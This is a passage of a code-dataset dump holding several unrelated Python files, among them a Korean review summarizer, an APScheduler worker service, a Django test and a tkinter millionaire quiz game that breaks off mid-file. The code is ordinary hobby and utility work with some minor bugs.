return (a + b)/ 2\n\ndef clear_list(messyList): # removes 0's from list\n clearedList = []\n for i in range(len(messyList)):\n for j in range(len(messyList[0])): # remove null offsets\n if messyList[i][j] > 0:\n clearedList.append(messyList[i][j])\n return clearedList\n\n\ndef pack_write_bounds(objName, file, endianess): # export bounds and calculated origin\n\n obj = bdata.objects[objName]\n vertices = obj.data.vertices\n \n verts = [obj.matrix_world @ vert.co for vert in vertices]\n\n for i in range(len(verts)):\n verts[i] *= scaleMult\n\n origin = midpoint2(verts[0], verts[1])\n\n\n file.write(struct.pack(endianess+'f'*6, *[ # write bounds\n verts[0][0],verts[0][1],verts[0][2],\n verts[1][0],verts[1][1],verts[1][2]\n ]))\n\n file.write(struct.pack(endianess+'f'*3, *[ # write origin\n origin[0],origin[1],origin[2]\n ]))\n \n #print(verts)\n #print(origin)\n\n #file.seek(0x24, 1)\n\n\ndef run_wout_update(func): # run without view update\n from bpy.ops import _BPyOpsSubModOp\n view_layer_update = _BPyOpsSubModOp._view_layer_update\n def dummy_view_layer_update(context):\n pass\n try:\n _BPyOpsSubModOp._view_layer_update = dummy_view_layer_update\n func()\n finally:\n _BPyOpsSubModOp._view_layer_update = view_layer_update\n\n\nrun_wout_update(export_bounds)\n","repo_name":"Linkz64/Python-Scripts","sub_path":"Blender/SSX/SSX Tricky/ssx2_export_world_ltg-btg.py","file_name":"ssx2_export_world_ltg-btg.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2656093828","text":"import re\nimport math\nimport requests\nimport networkx\nimport numpy as np\nfrom konlpy.tag import Okt\nfrom rank_bm25 import BM25Okapi\n\ndefault_stopwords = ['좋아요', '너무', '신발', '배송', '좀', '딱', '것', '주문', '마음', '때', '생각', '신어', '신고', '들어요', '상품', '좋습니다', '더', '맘', '좋은', '좋네요', '이뻐요', '정말', '아주', '거', '예뻐요'\n , '이쁘고', '감사합니다', '신', '평소', '좋고', '느낌', '이쁘네요', '색상', '완전', '제', '예쁘고', '고민', '그래도', '근데', '여름', '저', '대비', '신으면', '원래', '보고', '받았습니다', '빠른', '발도', '이쁩니다',\n '듭니', '실물', '깔끔하고', '또', '아들', '하세요', '신을게요', '분', '버스', '신는', '매우', '괜찮아요', '사서', '하게', '자주', '그리고', '하지만', '걱정', '예쁘네요', '네', '매장', '사람', '일단', '블랙', '흰색', '다만', '이번'\n , '다른', '색깔', '아이', '커플', '같은', '할인', '있어', '하고', '될', '없이', '이뻐서', '바로', '샀습니다', '보면', '예쁩니다', '전부', '상태', '쏙', '개', '파세요', '쿠폰', '좋아하네요', '스타일', '기분', '사세요', '빨리'\n , '예뻐서', '믿고', '훨씬', '좋아서', '때문', '포장', '꼭', '있을', '괜찮네요', '포인트', '살', '들어', '있네요', '굳', '받았어요', '반품', '뭐', '개인', '사고', '좋은데', '이쁘게', '괜찮은', '색도', '모두', '아직', '효과', '친구'\n , '엄마', '샀네요', '아직', '그대로', '다시', '만족해요', '좋아', '품절', '그래서', '심플', '계속', '신으니', '빨라요', '신랑', '물건', '무엇', '사줬는데', '선택', '드립니다', '한번', '곳', '신분', '강추', '작성', '받아', '딸', '여자친구'\n , '지금', '번', '좋음', '확실히', '후회', '봤는데', '전체', '같이', '왜', '있지만', '실제', '굿굿', '나', '굉장히', '기능', '산', '좋아해요', '와서', '예쁘게', '드렸는데', '한데', '같아', '분들', '했지만', '좋아용', '줄', '좋다고'\n , '하시면', '거의', '긴한데', '알았는데', '봄', '온', '백화점', '안드로이드', '내', '신습니다', '이쁨', '아무', '동생', '신을수', '의견', '저', '인해', '도착', '기도', '이유', '짱', '신던', '된', '게시', '만족도', '일반', '주관', '되어'\n , '소지', '무조건', '해도', '미리', '검정색', '사면', '빠르게', '그런데', '제', '무신', '건', '좋구요', '가장', '예쁜', '검은색', '도움', '잘산거', '이렇게', '이쁜데', '산거', '그렇게', '괜찮습니다', '성능', '이쁘', '트', '옥션', '되고'\n , '다닐', '감사', '되서', '오늘', '는', '택배', '시간', '득템', '꿈', '번창', '아니라', '타이', '정품', '딸아이', '없어요', '좋았습니다', '나름', '어느', '캐', '싸', '흰' '모델', '문제', '매일', '임', '남자친구', '시', '살까', '문'\n , '빠르네요', '좋을듯', '했던', '판매', '아니고', '씩', '알', '신을것', '들어하네요', '새', '니', '하지', '될것', '하다', '집', 
'왔네요', '신고있어요', '두번째', '맨날', '맛', '확인', '재', '가지', '갈', '오프라인', '금방', '다행', '맘에듭니'\n , '어느', '받고', '이쁜거', '특히', '귀엽고', '깔', '있었는데', '걍', '눈', '착한', '인터넷', '이용', '포스', '직접', '이쁘다고', '추합니다', '신경', '싶었는데', '검', '에드', '땐', '달', '신청', '귀찮아서', '상당히', '대박', '사길'\n , '베이지', '어머니', '뭔가', '그거', '리뷰', '적극', '자마자', '아빠', '좋으네요', '만족스러워요', '사실', '첨', '빠릅니다', '찾다가', '하면서', '하시네요', '할게요', '하자', '쫌', '오른쪽', '좋아해서', '좀더', '여러', '작년', '오히려'\n , '재고', '주얼', '착하고', '이런', '편입', '하얀색', '와이프', '좋아하시네요', '일주일', '이틀', '존예', '잘산것', '추강', '감사해요', '조아', '무신사', '예쁘다고', '예상', '짱짱', '빨랐어요', '암튼', '음', '레드', '환불', '해외', '싸게잘'\n , '적립금', '빠름', '좋겠네요', 'G', '예뻐용', '벗', '더욱', '엇', '남친', '지인', '부모님', '여성', '이뿌네요', '취소', '굿굿굿', '노란색', '감사합니당', '행사', '예쁘고요', '무슨', '종일', '해주세요', '괜찮', '바랍니다', '일부러', '딱히'\n , '사랑', '그렇고', '모든', '며칠', '검은', '좋다네요', '새끼', '쇼핑', '굳이', 's', '직원', '정가', '좋아하세요', '언제나', '하긴', '총알', '여러분', '내년', '지급', '언니', '갓', '모르겠어요', '결제', '괜찮음', 'Good', '정확히', '느리지만'\n ,'금액', '빨강', '여러가지', '심하게', '한가지', '당연히', '만원', '예뻐여', 'very', '뭘', '게다가', '갑자기', '아쉬운건', '당장', '부탁드려요', '통해', '고딩', '고등학생', '아영', '일찍', '점점', '완젼', '일요일', '배달', '홈쇼핑', '파시'\n , '출퇴근', '어머님', '스티커', '든다네요', '지연', '좋았구요', '잘쓸게요', '개꿀', '예쁘다', '귀엽습니다', '귀여워서', '물품', '살게요', '왕', '대박나세요', '예쁘다', '말씀', '들어하시네요', '사길잘', '예쁘고요', '오빠', '남동생', '역쉬'\n , '큰일', '화요일', '입학', '노란', '느려서', '기다렸는데', '아닌가', '이상하게', '좋아하시는', '만족하면서', '노란', '사이즈', '이벤트', '딸램', '수업', '블프', '좋아하고', '한국', '근본', '엄청나게', '같네요', '같아용', '가격', '저렴', '싸', '비싸'\n , '싸게', '싸서', '비싸고', '비싸지만', '싸네요', '싸니까', '싸요', '비싸긴', '비싸네요', '싸다', '싸지만', '싸다고', '비싸다고', '비싸지만', '싸구']\n\nclass KoreanReviewSummarizerError(Exception):\n pass\n\nclass SentenceObj:\n\n def __init__(self, text, tokens=[], index=0):\n self.index = index\n self.text = text\n self.tokens = tokens\n\nclass Summarizer:\n\n def __init__(self, k=3\n , useful_tags=['Noun', 'Verb', 'Adjective', 'Determiner', 'Adverb', 'Conjunction', 'Josa', 'PreEomi', 'Eomi', 'Suffix', 'Alpha', 'Number']\n , stopwords=None\n , delimiter='\\.|\\\\n|\\.\\\\n|\\!'\n , spell_check=True\n , return_all=False):\n self.k = k\n self.useful_tags=useful_tags\n if stopwords==None: self.stopwords=default_stopwords\n else: self.stopwords=stopwords\n self.delimiter=delimiter\n self.spell_check=spell_check\n self.return_all=return_all\n self.okt = Okt()\n if not isinstance(k, int):\n raise KoreanTextRank4ReviewError('k must be int')\n \n \n def summarize(self, reviews):\n if isinstance(reviews, list):\n reviews = ' '.join(reviews)\n self.splited_reviews = re.split(self.delimiter, reviews.strip())\n self.sentences = []\n self.sentence_index = 0\n\n _agent = requests.Session()\n for one_sentence in self.splited_reviews:\n while len(one_sentence) and (one_sentence[-1] == '.' 
or one_sentence[-1] == ' '):\n one_sentence = one_sentence.strip(' ').strip('.')\n if not one_sentence:\n continue\n if self.spell_check:\n try:\n base_url = 'https://m.search.naver.com/p/csearch/ocontent/spellchecker.nhn'\n headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'\n ,'referer': 'https://search.naver.com/'}\n payload= {\n '_callback': 'window.__jindo2_callback._spellingCheck_0'\n , 'q': one_sentence\n }\n _checked = _agent.get(base_url, params=payload, headers=headers)\n _checked = _checked.text[42:-2].split('\\\"html\\\":\\\"')[1].split('\\\"notag')[0]\n _words = []\n for word in words.split('>'):\n if not word.strip().startswith('<'):\n _words.append(word.split('<')[0].strip())\n one_sentence = ' '.join(_words)\n except:\n pass\n tokens = []\n word_tag_pairs = self.okt.pos(one_sentence)\n for word, tag in word_tag_pairs:\n if word in self.stopwords:\n continue\n if tag not in self.useful_tags:\n continue\n tokens.append(\"{}/{}\".format(word, tag))\n if len(tokens) < 2:\n continue\n sentence = SentenceObj(one_sentence.strip(), tokens, self.sentence_index)\n self.sentences.append(sentence)\n self.sentence_index += 1\n\n self.num_sentences = len(self.sentences)\n self.bm25 = BM25Okapi([sentenceObj.text for sentenceObj in self.sentences])\n for sentenceObj in self.sentences:\n sentenceObj.vector = self.bm25.get_scores(sentenceObj.text)\n \n self.matrix = np.zeros((self.num_sentences, self.num_sentences))\n for sentence1 in self.sentences:\n for sentence2 in self.sentences:\n if sentence1 == sentence2:\n self.matrix[sentence1.index, sentence2.index] = 1\n else:\n self.matrix[sentence1.index, sentence2.index] = \\\n len(set(sentence1.tokens) & set(sentence2.tokens)) / \\\n (math.log(len(sentence1.tokens)) + math.log(len(sentence2.tokens)))\n \n self.graph = networkx.Graph()\n self.graph.add_nodes_from(self.sentences)\n for sentence1 in self.sentences:\n for sentence2 in self.sentences:\n weight = self.matrix[sentence1.index, sentence2.index]\n if weight:\n self.graph.add_edge(sentence1, sentence2, weight=weight)\n self.pagerank = networkx.pagerank(self.graph, weight='weight')\n self.result = sorted(self.pagerank, key=self.pagerank.get, reverse=True)\n \n self.summaries = []\n if self.return_all:\n for i in range(len(self.result)):\n self.summaries.append(self.result[i].text)\n \n return self.summaries\n \n if self.k > len(self.result):\n for i in range(len(self.result)):\n self.summaries.append(self.result[i].text)\n else:\n for i in range(self.k):\n self.summaries.append(self.result[i].text)\n \n return self.summaries","repo_name":"kadarin123/KoreanReviewSummarizer","sub_path":"ks4r/ks4r.py","file_name":"ks4r.py","file_ext":"py","file_size_in_byte":11209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32955070231","text":"\"\"\"\n@Author: cgDeepLearn\n@Contact:cglearningnow@163.com\n@File: worker.py\n@Time: 2021/9/7 15:14\n\n@docstring: \n\"\"\"\n# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport datetime\nimport socket\nimport json\nimport requests\nimport pytz\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.events import EVENT_JOB_EXECUTED, EVENT_JOB_ERROR\nfrom config.aps import jobstores, executors, job_defaults\nfrom utils import logger\nfrom config import cfg\nfrom .process import JobParser, JobProcess\n\n\nsub_jid_separator = \":\" # 子任务分隔符\n\n\nclass APSWorker(object):\n 
__instance = None\n __inited = False\n\n def __new__(cls, *args, **kwargs):\n if not cls.__instance:\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\n def __init__(self):\n if not self.__inited:\n self.__inited = True\n tz = pytz.timezone('Asia/Shanghai')\n self.scheduler = BackgroundScheduler(\n jobstores=jobstores, executors=executors,\n job_defaults=job_defaults, timezone=tz)\n self.scheduler._logger = logger\n # add_listener\n self.scheduler.add_listener(self.my_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n self.scheduler.start()\n self.register() # 注册worker\n\n def my_listener(self, event):\n if event.exception:\n self.scheduler._logger.error(f\"{str(event.job_id)} error\")\n else:\n self.scheduler._logger.info(f\"{str(event.job_id)} run ok\")\n\n def get_jobs(self, jobstore='redis'):\n jobs = self.scheduler.get_jobs(jobstore=jobstore)\n job_ids = list()\n for job in jobs:\n job_ids.append(job.id)\n return job_ids\n\n def register(self):\n \"\"\"启动时,将worker信息注册到mgr\"\"\"\n loaded_jids = self.get_jobs()\n worker_config = cfg.get_services_cfg()\n mgr_host, mgr_port, worker_host = worker_config[-3:]\n mgr_url = f'http://{mgr_host}:{mgr_port}/task-mgr/register-worker'\n _, worker_port = cfg.get_flask_cfg()[0:2]\n # worker_host = socket.gethostbyname(socket.gethostname())\n worker_host_port = f'{worker_host}:{worker_port}'\n requests_headers = {'Content-Type': 'application/json;charset=UTF-8'}\n req_data = {\n 'worker_host': worker_host_port,\n 'all_sub_jids': loaded_jids\n }\n register_res = requests.post(mgr_url,\n data=json.dumps(req_data),\n headers=requests_headers,\n timeout=5)\n logger.info(\n f'register req: {req_data}, res: {register_res.text}')\n\n def add_task(self, task_args, jobstore='redis'):\n \"\"\"将任务下的子任务分别创建运行\"\"\"\n task_id = task_args[\"task_id\"]\n jobs_info = task_args[\"jobs_info\"]\n for sub_job_id, job_info in jobs_info.items():\n self.add_job(sub_job_id, job_info, jobstore=jobstore)\n logger.info(f\"added sub_job: {sub_job_id} of {task_id}\")\n logger.info(f\"task_id:{task_id} added\")\n\n def add_job(self, jid, job_info, jobstore='redis'):\n \"\"\"添加单个子任务\"\"\"\n trigger_info = job_info[\"trigger_info\"]\n action_info = job_info[\"action_info\"]\n ctrigger = JobParser.build_trigger(trigger_info)\n\n self.scheduler.add_job(JobProcess.run, trigger=ctrigger,\n id=str(jid), args=(jid, action_info),\n jobstore=jobstore, replace_existing=True)\n\n def remove_task(self, task_id, sub_job_ids, jobstore='redis'):\n \"\"\"删除任务下的子任务\"\"\"\n for jid in sub_job_ids:\n self.remove_job(jid, jobstore=jobstore)\n logger.info(f\"task_id: {task_id} removed jids: {sub_job_ids}\")\n\n def remove_job(self, jid, jobstore='redis'):\n \"\"\"删除单个子任务\"\"\"\n self.scheduler.remove_job(jid, jobstore=jobstore)\n logger.info(f\"jid: {jid} removed\")\n\n\naps_worker = APSWorker()\n","repo_name":"cgDeepLearn/scheduler","sub_path":"src/sworker/worker/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27249698692","text":"# 获取单词库\n# 新东方 url = \"https://www.koolearn.com/dict/zimu_a_1.html\"\n# 词根库 url = \"http://www.etymon.cn/yingyucizhui/list_2_1.html\"\nimport requests\nfrom bs4 import BeautifulSoup\nfrom lxml import etree\n\n# url = \"https://www.koolearn.com/dict/zimu_a_1.html\"\nurl = \"http://www.etymon.cn/yingyucizhui/list_2_1.html\"\nhead = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/90.0.4430.93 Safari/537.36\"}\nre = requests.get(url,headers=head)\nre.encoding = 'utf-8'\nhtml = re.text\n# print(html)\n\nbs = BeautifulSoup(html,features=\"html.parser\")\ndl = bs.find(\"div\",id='dictionary').find(\"dl\")\n\nfor dt in dl.find_all('dt'):\n print(dt.text)\n# print(dl.text)\n# tree = etree.HTML(html)\n\n","repo_name":"mimill123456/word_game","sub_path":"src/pre/getwords.py","file_name":"getwords.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35321603214","text":"import pytest\nfrom . import models\n\n\ndef test_credit(db):\n data = {\n 'first_name': 'Максим',\n 'last_name': 'Балабанов',\n 'iin': '911106451061',\n 'phone': '77778464774'\n }\n person = models.Person.objects.create(**data)\n data = {\n 'cash': 30,\n 'status': 'active',\n 'person': person\n }\n credit = models.Credit.objects.create(**data)\n assert isinstance(credit, models.Credit)\n","repo_name":"beisembayev/my-first-blog","sub_path":"credit/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17455026648","text":"# 공부한 코드 ( https://hillier.tistory.com/102 )\nimport sys\ninput = sys.stdin.readline\ndef nextPermutation(arr):\n i = len(arr)-2\n while i >= 0 and arr[i] >= arr[i+1]:\n i -= 1\n if i == -1:\n return False\n \n j = len(arr)-1\n while arr[i] >= arr[j]:\n j -= 1\n \n arr[i], arr[j] = arr[j], arr[i]\n result = arr[:i+1]\n result.extend(list(reversed(arr[i+1:])))\n return result\n \n \nT = int(input())\nfor _ in range(T):\n _input = list(input().rstrip())\n answer = nextPermutation(_input)\n if not answer:\n print(\"\".join(_input))\n else:\n print(\"\".join(answer))\n\n# 실패한 코드 - permutations으로 조합을 만든 후 정렬하여 찾기\n# 정답은 나오지만 메모리 초과\n# import sys\n# from itertools import permutations\n\n# T = int(sys.stdin.readline())\n# for i in range(T):\n# word = sys.stdin.readline().rstrip()\n# words = [\"\".join(w) for w in permutations(word)]\n# words = sorted(set(words))\n# word_index = words.index(word)\n# if word_index == len(words)-1:\n# print(word)\n# else:\n# print(words[word_index+1])\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열-실버-문제-모음/51-단어_맞추기.py","file_name":"51-단어_맞추기.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20409539684","text":"# Millionaire Game Project\nfrom tkinter import *\nfrom tkinter.ttk import Progressbar\nfrom pygame import mixer\nimport pyttsx3\n\nengine = pyttsx3.init()\nvoices = engine.getProperty(\"voices\")\nengine.setProperty(\"voices\", voices[0].id)\n\nmixer.init()\nmixer.music.load(\"Image Folder/kbc.mp3\")\nmixer.music.play(-1)\n\ndef select(event):\n callButton.place_forget()\n\n progressbarA.place_forget()\n progressbarB.place_forget()\n progressbarC.place_forget()\n progressbarD.place_forget()\n\n progressbarLabelA.place_forget()\n progressbarLabelB.place_forget()\n progressbarLabelC.place_forget()\n progressbarLabelD.place_forget()\n\n b=event.widget\n value = b['text']\n\n for i in range(15):\n if value == correct_answer[i]:\n if value == correct_answer[14]:\n def Close():\n window2.destroy()\n window.destroy()\n\n def PlayAgain():\n Life_Line_50_Button.config(state=NORMAL, image=Image_50)\n Audience_Pole_Button.config(state=NORMAL, image=Audience_Pole)\n PhoneAFriend_Button.config(state=NORMAL, 
image=PhoneAFriend_Image)\n\n window2.destroy()\n Question_Area.delete(1.0, END)\n Question_Area.insert(my_questions[0])\n\n optionButton1.config(text=option1[0])\n optionButton2.config(text=option2[0])\n optionButton3.config(text=option3[0])\n optionButton4.config(text=option4[0])\n\n Amount_Label.config(imgage=Amount_Image)\n\n mixer.music.stop()\n mixer.music.load(\"Image Folder/Kbcwon.mp3\")\n mixer.music.play()\n\n window2 = Toplevel()\n window2.config(bg=\"black\")\n window2.geometry('500x400+140+30')\n window2.title('You Won 0 Pounds')\n imgLabel = Label(window2, image=Center_Image, bd=0)\n imgLabel.pack(pady=30)\n\n winLabel = Label(window2, text=\"You Won\", font=(\"Arial\", 40, \"bold\"), bg=\"black\", fg=\"white\")\n winLabel.pack()\n\n playagainButton = Button(window2, text=\"Play Again\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=PlayAgain)\n playagainButton.pack()\n\n closeButton = Button(window2, text=\"Close\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=Close)\n closeButton.pack()\n\n happyImages = PhotoImage(file=\"Image Folder/happy.png\")\n happyLabel = Label(window2, image=happyImages, bg=\"black\")\n happyLabel.place(x=30, y=280)\n\n happyLabel1 = Label(window2, image=happyImages, bg=\"black\")\n happyLabel1.place(x=400, y=280)\n\n window2.mainloop()\n break\n\n\n Question_Area.delete(1.0, END)\n Question_Area.insert(END, my_questions[i + 1])\n\n optionButton1.config(text=option1[i + 1])\n optionButton2.config(text=option2[i + 1])\n optionButton3.config(text=option3[i + 1])\n optionButton4.config(text=option4[i + 1])\n\n Amount_Label.config(image=Amount_Images[i])\n\n if value not in correct_answer:\n def Close():\n window1.destroy()\n window.destroy()\n\n def TryAgain():\n Life_Line_50_Button.config(state=NORMAL, image=Image_50)\n Audience_Pole_Button.config(state=NORMAL, image=Audience_Pole)\n PhoneAFriend_Button.config(state=NORMAL, image=PhoneAFriend_Image)\n\n window1.destroy()\n Question_Area.delete(1.0, END)\n Question_Area.insert(my_questions[0])\n\n optionButton1.config(text=option1[0])\n optionButton2.config(text=option2[0])\n optionButton3.config(text=option3[0])\n optionButton4.config(text=option4[0])\n\n Amount_Label.config(imgage=Amount_Image)\n\n\n window1 = Toplevel()\n window1.overrideredirect(True)\n window1.config(bg=\"black\")\n window1.geometry('500x400+140+30')\n window1.title('You Won 0 Pounds')\n imgLabel = Label(window1, image=Center_Image, bd=0)\n imgLabel.pack(pady=30)\n\n loseLabel = Label(window1, text=\"You Lose\", font=(\"Arial\", 40, \"bold\"), bg=\"black\", fg=\"white\")\n loseLabel.pack()\n\n tryagainButton = Button(window1, text=\"Try Again\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=TryAgain)\n tryagainButton.pack()\n\n closeButton = Button(window1, text=\"Close\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=Close)\n closeButton.pack()\n\n sadImages = PhotoImage(file=\"Image Folder/sad.png\")\n sadLabel = Label(window1, image=sadImages, bg=\"black\")\n sadLabel.place(x=30, y=280)\n\n sadLabel1 = Label(window1, image=sadImages, bg=\"black\")\n sadLabel1.place(x=400, y=280)\n\n window1.mainloop()\n 
break\n\ndef lifeLine50():\n\n Life_Line_50_Button.config(image=Image_50x, state=DISABLED)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[0]:\n optionButton1.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[1]:\n optionButton2.config(text=\"\")\n optionButton3.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[2]:\n optionButton1.config(text=\"\")\n optionButton2.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[3]:\n optionButton2.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[4]:\n optionButton3.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[5]:\n optionButton2.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[6]:\n optionButton2.config(text=\"\")\n optionButton3.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[7]:\n optionButton2.config(text=\"\")\n optionButton3.config(text=\"\")\n\n\ndef audiencePoleLifeLine():\n Audience_Pole_Button.config(image=Audience_Polex, state=DISABLED)\n\n\n progressbarA.place(x=580, y=190)\n progressbarB.place(x=620, y=190)\n progressbarC.place(x=660, y=190)\n progressbarD.place(x=700, y=190)\n\n progressbarLabelA.place(x=580, y=320)\n progressbarLabelB.place(x=620, y=320)\n progressbarLabelC.place(x=660, y=320)\n progressbarLabelD.place(x=700, y=320)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[0]:\n progressbarA.config(value=30)\n progressbarB.config(value=50)\n progressbarC.config(value=90)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[1]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=30)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[2]:\n progressbarA.config(value=30)\n progressbarB.config(value=50)\n progressbarC.config(value=90)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[3]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=30)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[4]:\n progressbarA.config(value=30)\n progressbarB.config(value=90)\n progressbarC.config(value=50)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[5]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=70)\n progressbarD.config(value=30)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[6]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=30)\n progressbarD.config(value=70)\n\n\ndef PhoneLifeLine():\n mixer.music.load('Image Folder/calling.mp3')\n mixer.music.play()\n callButton.place(x=70, y=260)\n PhoneAFriend_Button.config(image=PhoneAFriend_Imagex, state=DISABLED)\n\ndef phoneclick():\n for i in range(15):\n if Question_Area.get(1.0, \"end-1c\") == my_questions[i]:\n engine.say(f\"The Answer is {correct_answer[i]}\")\n engine.runAndWait()\n\ncorrect_answer = [\"93 million\", \"Moth\", \"Isaac Newton\", \"Lesotho\",\n \"Peru\", \"C\", \"Van Rossum\", \"1989\", \"100 billion\",\n \"Baghdad\", \"Six iron\", \"Johannes Kepler\",\"Trees\", \"1949\", \"1815\"]\n\n\n\n\n\n\n\n\n\nmy_questions = [\"The Earth is approximately how many miles away from 
the Sun?\",\n \"Which insect shorted out an early supercomputer and inspired the term 'computer bug'?\",\n \"Which of the following men does not have a chemical element named for him?\",\n \"Which of the following landlocked countries is entirely contained within another country?\",\n \"In the children’s book series, where is Paddington Bear originally from?\",\n \" Python is written in which language?\",\n \"Python was developed by\",\n \"Python was developed in which year?\",\n \"According to the Population Reference Bureau, what is the approximate number of people who have ever lived on earth?\",\n \"Now used to refer to a cat, the word 'tabby' is derived from the name of a district of what world capital?\",\n \"What club did astronaut Alan Shepard use to make his famous golf shot on the moon?\",\n \"What scientist first determined that human sight results from images projected onto the retina?\",\n \"If you planted the seeds of Quercus robur, what would grow?\",\n \"When did Mao Zedong come to power?\",\n \"What year did the War of 1812 end?\"\n ]\n\noption1 = [\"9.3 million\", \"Moth\",\n \"Albert Einstein\", \"Lesotho\",\n \"India\", \"C\", \"Van Rossum\",\n \"1972\", \"5o billion\", \"Baghdad\",\n \"Nine iron\", \"Galileo\", \"Trees\", \"1947\", \"1813\"]\n\n\noption2 = [\"39 million\", \"Roach\",\n \"Niels Bohr\", \"Burkina Faso\",\n \"Peru\", \"C++\",\n \"James Gosling\",\n \"1995\", \"100 billion\",\n \"New Delhi\", \"Sand wedge\",\n \"Copernicus\", \"Flowers\", \"1948\", \"1815\"]\n\noption3 = [\"93 million\", \"Fly\",\n \"Isaac Newton\", \"Mongolia\",\n \"Canada\", \"Java\",\n \"Dennis Ritchie\", \"1989\",\n \"1 trillion\", \"Cairo\",\n \"Six iron\", \"Johannes Kepler\",\n \"Vegetables\", \"1949\", \"1817\"]\n\noption4 = [\"193 million\", \"Japanese beetle\",\n \"Enrico Fermi\", \"Luxembourg\",\n \"Iceland\", \"None of the above\",\n \"Bjarne Stroustrup\", \"1981\",\n \"5 trillion\", \"Moscow\",\n \"Seven iron\", \"Isaac Newton\", \"Grain\", \"1950\", \"1821\"]\n\n\n\n\n\n\n\n\n\n\n\n# WINDOW SETUP\nwindow = Tk()\nwindow.geometry('1270x652+0+0')\nwindow.title(\"Who Wants To Be a Millionaire Created By BiPLoB DAsH\")\nwindow.config(bg=\"black\")\n\n# CREATE FRAME\nLeft_Frame = Frame(window, bg=\"black\", padx=90)\nLeft_Frame.grid(row=0, column=0)\n\nTop_Frame = Frame(Left_Frame, bg=\"black\", pady=15)\nTop_Frame.grid()\n\nCenter_Frame = Frame(Left_Frame, bg=\"black\", pady=15)\nCenter_Frame.grid(row=1, column=0)\n\nBottom_Frame = Frame(Left_Frame)\nBottom_Frame.grid(row=2, column=0)\n\nRight_Frame = Frame(window, pady=25, padx=50, bg=\"black\")\nRight_Frame.grid(row=0, column=1)\n\n\n# TOP PHOTO SETUP\nImage_50 = PhotoImage(file=\"Image Folder/50-50.png\")\nImage_50x = PhotoImage(file=\"Image Folder/50-50-X.png\")\nAudience_Pole = PhotoImage(file=\"Image Folder/audiencePole.png\")\nAudience_Polex = PhotoImage(file=\"Image Folder/audiencePoleX.png\")\nPhoneAFriend_Image = PhotoImage(file=\"Image Folder/phoneAFriend.png\")\nPhoneAFriend_Imagex = PhotoImage(file=\"Image Folder/phoneAFriendX.png\")\n\n# TOP BUTTON CREATED\n# Life Line Button\nLife_Line_50_Button = Button(Top_Frame, image= Image_50, bg=\"black\", bd=0, activebackground=\"black\", width=180, height=80, command=lifeLine50)\nLife_Line_50_Button.grid(row=0, column=0)\n\n# Audience Pole Button\nAudience_Pole_Button = Button(Top_Frame, image= Audience_Pole, bg=\"black\", bd=0, activebackground=\"black\", width=180, height=80,\n command=audiencePoleLifeLine)\nAudience_Pole_Button.grid(row=0, column=1)\n\n# Phone A Friend 
